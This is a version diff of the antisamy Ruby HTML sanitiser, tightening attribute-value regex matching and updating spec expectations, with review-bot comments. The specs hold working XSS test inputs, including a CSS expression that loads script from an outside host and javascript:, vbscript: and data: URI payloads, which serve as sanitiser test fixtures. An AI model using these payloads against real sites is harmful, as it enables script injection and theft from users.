antisamy 0.2.0 → 0.2.1

@@ -177,7 +177,7 @@ module AntiSamy
177
177
  unless valid
178
178
  attrib.expressions.each do |ae|
179
179
  mc = ae.match(a_value)
180
- if mc and mc.size == a_value.size
180
+ if mc and mc.to_s == a_value
181
181
  valid_attributes << [a_name,a_value]
182
182
  valid = true
183
183
  break
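Review bot: The new condition `if mc and mc.to_s == a_value` is correct but carries no explanation of why a bare `ae.match(a_value)` is not enough: `match` succeeds on a hit anywhere in the value, so only the full-text comparison stops a policy expression from approving an attribute value that merely contains an allowed substring, which appears to be the attribute-value whitelist this branch implements. Suggest `if mc && mc.to_s == a_value # policy regex must cover the whole value, not a substring`, using `&&` rather than the low-precedence `and` keyword so the line reads like the rest of a RuboCop-style file. The enclosing method, and the initialisation of `valid` and `valid_attributes`, start outside the hunk, so the fall-through when no expression matches could not be checked here.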
@@ -85,8 +85,8 @@ module AntiSamy
85
85
  "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
86
86
  "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
87
87
  "<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
88
- "<a . href=\"http://www.test.com\">" => "href",
89
- "<a - href=\"http://www.test.com\">" => "href",
88
+ "<a . href=\"http://www.test.com\">" => " . ",
89
+ "<a - href=\"http://www.test.com\">" => "-",
90
90
  "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
91
91
  "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
92
92
  "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
@@ -114,7 +114,7 @@ module AntiSamy
114
114
  "<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
115
115
  "<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
116
116
  "<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
117
- "<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "href",
117
+ "<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "blur",
118
118
  "<b><i>Some Text</b></i>" => "<i />",
119
119
  "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
120
120
  "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
@@ -132,5 +132,11 @@ module AntiSamy
132
132
  r.clean_html.should_not be_empty
133
133
  end
134
134
 
135
+ it "should not touch this url" do
136
+ input = "<a href=\"http://www.aspectsecurity.com\">Aspect Security</a>"
137
+ r = AntiSamy.scan(input,policy_object)
138
+ r.clean_html.should == input
139
+ end
140
+
135
141
  end
136
142
  end
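Review bot: The expectation values changed at lines 88, 89 and 117 (`"href"` → `" . "`, `"-"`, `"blur"`) read as the fragment that must be absent from the cleaned output, but nothing in the hunk says so; a one-line comment above the hash such as `# input html => fragment that must not survive sanitising` would make the reason for the switch (a well-formed `href` is now expected to be kept) self-explanatory. How the values are compared is decided where the hash is consumed, outside this hunk, so that reading is inferred. The new spec's `r.clean_html.should == input` is a useful regression for the attribute-value check but pins exact output formatting; if the sanitiser ever normalises quoting or whitespace, asserting that `href="http://www.aspectsecurity.com"` is present would state the intent more precisely. `policy_object` is defined outside the hunk and could not be checked.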
metadata CHANGED
@@ -2,7 +2,7 @@
2
2
  name: antisamy
3
3
  version: !ruby/object:Gem::Version
4
4
  prerelease:
5
- version: 0.2.0
5
+ version: 0.2.1
6
6
  platform: ruby
7
7
  authors:
8
8
  - Sal Scotto
@@ -174,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
174
174
  requirements:
175
175
  - - ">="
176
176
  - !ruby/object:Gem::Version
177
- hash: -3694882257398018241
177
+ hash: -3180054777523401817
178
178
  segments:
179
179
  - 0
180
180
  version: "0"